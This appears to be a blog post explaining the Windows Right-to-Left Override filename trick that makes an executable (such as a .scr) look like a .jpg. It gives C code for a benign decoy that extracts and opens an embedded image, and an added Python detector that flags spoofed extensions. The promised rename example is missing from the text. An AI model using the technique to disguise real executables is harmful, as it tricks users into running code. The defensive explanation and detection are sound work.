Windows RLO Vulnerability

So there's an interesting bug in Windows when using the U+202E unicode Right-to-Left Override [RLO] character in a filename. You can essentially make a dangerous file masquerade as something harmless like an image file.

As a proof of concept look at the following example. Here we have a perfectly innocent meme called Narcs.jpg. We embed it as a resource in a simple C application.

#include <windows.h>
#include <fstream>
#include <tchar.h>
#include "resource.h"   // project header that defines IDR_JPEG1 for the embedded Narcs.jpg

#define BUFSIZE 65536

#define countof(array) (sizeof(array)/sizeof(array[0]))

void Debug(LPCTSTR szFormat, ...);

int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    DWORD dwRetVal;
    DWORD dwBufSize = BUFSIZE;
    WCHAR lpPathBuffer[BUFSIZE];
    CHAR lpPath[BUFSIZE];

    // Call the wide-character API explicitly so it matches the WCHAR buffer
    // regardless of whether the project is built with UNICODE defined.
    dwRetVal = GetTempPathW(dwBufSize, lpPathBuffer);

    if (dwRetVal == 0 || dwRetVal > dwBufSize)
        return 0;

    // GetTempPath returns a trailing backslash, so the filename can be appended directly.
    wcscat_s(lpPathBuffer, countof(lpPathBuffer), L"Narcs.jpg");

    // Narrow copy of the path for the stream constructor; keep it NUL-terminated.
    wcstombs(lpPath, lpPathBuffer, BUFSIZE - 1);
    lpPath[BUFSIZE - 1] = '\0';

    // Locate the JPEG embedded in the executable's resource section.
    HRSRC hrSrc = FindResourceW(hInstance, MAKEINTRESOURCEW(IDR_JPEG1), L"JPG");

    if (!hrSrc)
        return 0;

    HGLOBAL hJpeg = LoadResource(hInstance, hrSrc);

    if (!hJpeg)
        return 0;

    DWORD jpegSize = SizeofResource(hInstance, hrSrc);

    if (!jpegSize)
        return 0;

    unsigned char* jpegData = (unsigned char*)LockResource(hJpeg);

    if (!jpegData)
        return 0;

    // Write the raw bytes out to %TEMP%\Narcs.jpg.
    std::ofstream outputFile(lpPath, std::ios::out | std::ios::binary);

    outputFile.write(reinterpret_cast<const char*>(jpegData), jpegSize);

    outputFile.close();

    // Open the extracted image with the default handler registered for .jpg.
    ShellExecuteW(NULL, NULL, lpPathBuffer, NULL, NULL, SW_SHOWNORMAL);

    return 0;
}

It's compiled to Narcs.exe. The trick now is to rename it like so:

Now the file will appear to be named Narcs.jpg, but upon launch it will run, extract Narcs.jpg to the Temp folder and display it using the default Shell application associated with JPEGs. The problem here is that a screensaver file (extension .scr) is essentially an executable and can now do whatever nefarious things it likes.
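As an added example (not code from the original post), here is a small Python screen for filenames that carry bidi override characters: it approximates how a left-to-right UI such as Explorer renders the name, compares the extension the user sees with the real one, and flags runnable files such as .scr that display as something else. The sample names and the extension list are constructed for the demonstration.

```python
from pathlib import PurePath

# Unicode bidirectional formatting characters that can reorder a rendered name.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}
# Extensions Windows runs as code; .scr is the one the post describes.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".ps1", ".msi", ".lnk"}

def rendered_name(name: str) -> str:
    """Approximate how a left-to-right UI draws the name: the run after U+202E
    (up to a U+202C or the end) is drawn reversed; the controls themselves are invisible."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202e":
            end = name.find("\u202c", i + 1)
            stop = len(name) if end == -1 else end
            out.append(name[i + 1:stop][::-1])
            i = stop + 1          # also skips the PDF terminator when present
        elif ch in BIDI_CONTROLS:
            i += 1                # other controls: drop; no reordering modelled
        else:
            out.append(ch)
            i += 1
    return "".join(out)

def inspect_filename(name: str) -> dict:
    """Compare the real extension with the one a user would see on screen."""
    shown = rendered_name(name)
    real_ext, shown_ext = PurePath(name).suffix.lower(), PurePath(shown).suffix.lower()
    controls = sorted({BIDI_CONTROLS[c] for c in name if c in BIDI_CONTROLS})
    return {"name": name, "rendered": shown, "real_ext": real_ext, "shown_ext": shown_ext,
            "controls": controls,
            "suspicious": bool(controls) and real_ext in EXECUTABLE_EXTS and shown_ext != real_ext}

def scan(names):
    """Inspection records for every name that should be flagged."""
    return [r for r in map(inspect_filename, names) if r["suspicious"]]

# Constructed sample listing (hypothetical names, not taken from the post).
SAMPLE_NAMES = ["Narcs.jpg", "Photo\u202egpj.scr", "invoice\u202efdp.exe", "report\u202efdp.txt"]

if __name__ == "__main__":
    for r in scan(SAMPLE_NAMES):
        print(f"FLAG: shown as {r['rendered']!r}, real extension {r['real_ext']} ({', '.join(r['controls'])})")
```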

Thankfully Microsoft is aware of this issue, and Windows Defender will now detect and quarantine such a file immediately.